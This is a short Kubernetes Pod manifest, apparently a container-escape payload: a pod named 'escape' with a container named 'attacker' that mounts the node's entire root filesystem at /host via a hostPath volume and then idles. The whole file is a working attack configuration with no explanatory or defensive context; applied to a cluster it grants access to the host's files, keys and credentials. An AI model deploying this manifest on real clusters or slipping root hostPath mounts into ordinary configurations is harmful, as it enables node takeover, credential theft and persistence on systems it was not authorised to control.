apiVersion: v1
kind: Pod
metadata:
  name: escape
spec:
  containers:
  - name: attacker
    image: alpine
    command: ["sh", "-c", "sleep 3600"]
    volumeMounts:
    - mountPath: /host
      name: root
  volumes:
  - name: root
    hostPath:
      path: /
